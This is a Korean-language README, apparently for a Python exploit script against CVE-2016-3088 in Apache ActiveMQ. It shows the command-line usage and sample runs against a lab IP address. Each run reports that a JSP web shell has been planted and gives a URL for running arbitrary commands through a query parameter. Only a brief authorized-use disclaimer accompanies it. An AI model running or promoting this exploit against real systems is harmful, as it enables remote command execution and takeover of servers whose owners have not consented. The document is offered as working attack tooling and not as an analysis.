
CVE-2016-3088용 Python 기반 익스플로잇 스크립트
CVE-2016-3088을 위한 Python 기반 익스플로잇 스크립트입니다.
이것은 제 첫 스크립트라 어딘가 맞지 않는 부분이 있을 수 있습니다.
하지만 제가 테스트했을 때는 잘 동작하는 것 같습니다.
이 스크립트는 CVE-2016-3088 침투 중 패킷 캡처의 필요성을 없애줍니다.
그래서 파일을 직접 쓰고 이동할 수 있습니다.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
--script 매개변수는 선택 사항입니다. 이 매개변수 없이 프로그램을 실행하면 내장 페이로드를 사용합니다.
이 페이로드는 URL에서 몇 가지 명령만 실행할 수 있게 해줍니다.
하지만 다른 스크립트를 입력하여 목적을 달성할 수 있습니다.
.py 파일을 다운로드하면 됩니다.
그리고 몇 가지 모듈이 필요합니다.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
이 도구는 주의해서 사용하고 승인된 경우에만 사용하세요!